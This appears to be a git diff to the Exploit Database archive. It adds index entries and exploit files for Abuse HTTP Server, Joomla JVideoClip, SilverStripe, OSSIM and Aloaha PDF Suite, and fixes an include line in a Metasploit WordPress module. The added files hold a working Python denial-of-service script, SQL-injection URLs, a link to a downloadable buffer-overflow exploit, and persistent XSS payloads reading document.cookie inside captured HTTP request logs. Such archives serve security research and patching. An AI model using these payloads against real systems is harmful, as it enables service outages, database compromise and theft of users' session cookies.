diff --git a/files.csv b/files.csv index 4effcd0b7..19b583e10 100755 --- a/files.csv +++ b/files.csv @@ -35014,6 +35014,7 @@ id,file,description,date,author,platform,type,port 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0 +38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow Vulnerability",2013-08-28,"Marcos Accossatto",windows,remote,0 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0 38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0 @@ -35043,5 +35044,9 @@ id,file,description,date,author,platform,type,port 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass Vulnerability",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 +38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 +38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0 +38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0 +38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 diff --git a/platforms/multiple/dos/38779.py b/platforms/multiple/dos/38779.py new file mode 100755 index 000000000..c88edbd21 --- /dev/null +++ b/platforms/multiple/dos/38779.py @@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/62723/info + +Abuse HTTP Server is prone to a remote denial-of-service vulnerability. + +Attackers can exploit this issue to cause denial-of-service conditions. + +Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. + +#!/usr/bin/python + +import socket +import os +import sys + +crash = "0" * 504 + +buffer="GET / HTTP/1.1\r\n" +buffer+="Host: " + crash + "\r\n" +buffer+="Content-Type: application/x-www-form-urlencoded\r\n" +buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n" +buffer+="Content-Length : 1048580\r\n\r\n" + +print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com" +print "[*] Change some option in code with your self" +print "[*] Connect to host and send payload" + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect(("192.168.1.101", 80)) +expl.send(buffer) +print "[*] Server Disconected" +expl.close() \ No newline at end of file diff --git a/platforms/php/remote/38660.rb b/platforms/php/remote/38660.rb index 20a378785..2dbe2afd4 100755 --- a/platforms/php/remote/38660.rb +++ b/platforms/php/remote/38660.rb @@ -8,7 +8,11 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HTTP::Wordpress + # EDB note: + # This line causes an error when loading + # include Msf::Exploit::Remote::HTTP::Wordpress + # Replaced with the following: + include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) diff --git a/platforms/php/webapps/38777.txt b/platforms/php/webapps/38777.txt new file mode 100755 index 000000000..188efb8d2 --- /dev/null +++ b/platforms/php/webapps/38777.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/62610/info + +The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +JVideoClip 1.5.1 is vulnerable; other versions may also be affected. + +http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 \ No newline at end of file diff --git a/platforms/php/webapps/38780.txt b/platforms/php/webapps/38780.txt new file mode 100755 index 000000000..43ca2c22f --- /dev/null +++ b/platforms/php/webapps/38780.txt @@ -0,0 +1,415 @@ +source: http://www.securityfocus.com/bid/62782/info + +SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. + +SilverStripe 3.0.5 is vulnerable; other versions may also be affected. + +Proof of Concept: +================= +1.1 +The first persistent input validation web vulnerability can be exploited +by remote attackers with low privileged application user accounts and +low required user interaction. For demonstration or reproduce ... + + +PoC: Groups & Rollen (Roles) - Print + + +SilverStripe - Sicherheit + + + +

SilverStripe - Sicherheit

+ + + + + + +
VornameNachnameE-Mail
+

+Gedruckt am 11:44pm, 22/09/2013 +
+Gedruckt von a%20>"

+ + +POST +http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm +Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] +Content Size[20] Mime Type[text/html] + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Content-Type[application/x-www-form-urlencoded; charset=UTF-8] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new] +Content-Length[336] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] +Pragma[no-cache] +Cache-Control[no-cache] + +Post Data: +Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C] +ParentID[] +ID[] +SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] +action_doSave[1] +BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:20 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/; +httponly] +X-ControllerURL[admin/security/EditForm/field/Groups/item/4] +X-Pjax[CurrentForm,Breadcrumbs] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css? +m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css? +m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[20] + + +Status: 200[OK] +GET http://www.example.com/admin/security/EditForm/field/Groups/item/4 +Load Flags[LOAD_BACKGROUND ] +Content Size[3966] Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; + +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd= +organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:21 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m= +1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? +m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, +/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[3966] + + +Status: 200[OK] +GET +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/ +field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert +(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B +GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 +GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 +GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail +%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken +<== +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] +Content Size[378] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel- +collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:26 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[378] + + +Status: 200[OK] +GET +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT +INJECTED SCRIPT CODE AS PATH!] +Load Flags[LOAD_DOCUMENT_URI ] +Content Size[20] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/ +Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload +%3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B +GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 +GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 +GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4& +SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.8.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; +PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google| +utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +cms-panel-collapsed-cms-content-tools-AssetAdmin=true; +cms-panel-collapsed-cms-content-tools-CMSMain=false; +cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] +Connection[keep-alive] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:44:27 GMT] +Content-Type[text/html; charset=utf-8] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/; +httponly] +X-Controller[SecurityAdmin] +X-Title[SilverStripe - Sicherheit] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[20] + + + +PoC: (Client-Side Link) +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members +?Title=a%25[PERSISTENT INJECTED SCRIPT +CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=& +Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2 +C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22 +currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail +%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken + + +Reference(s): +http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles +http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit +http://www.example.com/admin/security/EditForm/field/Roles/item/new +http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm +http://www.example.com/admin/security/EditForm/field/Groups/item/4 +http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x + + + + + + +1.2 +The secound persistent input validation web vulnerability and filter +bypass vulnerability can be exploited by remote attackers +with low privileged application user accounts with low required user +interaction. For demonstration or reproduce ... + + +PoC: Model Admin > Add Company > Edit Company + +'>"<[PERSISTENT INJECTED SCRIPT +CODE!]>' ist kein numerischer Wert, +nur nummerische Werte sind in diesem Feld erlaubt + +
+ +
+" class="text" id="Form_ItemEditForm_CEO" /> +
+ +Note: The vulnerability is located in the message validation filter +exception-handling. + + + +--- PoC Session Request Logs --- + +Status: 200[OK] +POST +http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm +Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] +Content Size[1309] +Mime Type[text/html] + + +Request Headers: +Host[www.example.com] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 +Firefox/23.0] +Accept[*/*] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +Content-Type[application/x-www-form-urlencoded; charset=UTF-8] +X-Pjax[CurrentForm,Breadcrumbs] +X-Requested-With[XMLHttpRequest] +Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=] +Content-Length[560] +Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; +__utmb=1.7.10.1379847695; __utmc=1; +__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); +PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; +cms-panel-collapsed-cms-content-tools-CMSPagesController=true; +cms-panel-collapsed-cms-menu=false; +cms-panel-collapsed-cms-content-tools-ModelAdmin=false; +__utma=1.1551299670.1379847854.1379847854.1379847854.1; +__utmb=1.5.10.1379847854; __utmc=1; +__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)] +Connection[keep-alive] +Pragma[no-cache] +Cache-Control[no-cache] + + +Post Data: +Name[Evolution+Security] +Category[TEST+PP] +Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] +<= [PERSISTENT INJECTED TEST CODES!] +CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] +RelationFieldsTestPageID[] +GridFieldTestPageHasOneID[] +SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] +action_doSave[1] +BackURL +[http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F +new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F] + + +Response Headers: +Server[nginx] +Date[Sun, 22 Sep 2013 11:20:33 GMT] +Content-Type[text/html] +Connection[keep-alive] +Expires[Thu, 19 Nov 1981 08:52:00 GMT] +Cache-Control[no-cache, max-age=0, must-revalidate] +Pragma[no-cache] +Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/; +httponly] +X-Controller[TestModelAdmin] +X-Title[SilverStripe - Test ModelAdmin] +X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& +plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen +%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? +m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457] +X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458, +/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? +m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, +/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] +Vary[Accept-Encoding] +Content-Encoding[gzip] +Content-Length[1309] + + diff --git a/platforms/php/webapps/38781.txt b/platforms/php/webapps/38781.txt new file mode 100755 index 000000000..c9d04b9aa --- /dev/null +++ b/platforms/php/webapps/38781.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/62790/info + +Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable. + +http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here% + +http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here% \ No newline at end of file diff --git a/platforms/windows/remote/38742.txt b/platforms/windows/remote/38742.txt new file mode 100755 index 000000000..b0c894a44 --- /dev/null +++ b/platforms/windows/remote/38742.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/62036/info + +Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability. + +Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. + +https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/62036.zip \ No newline at end of file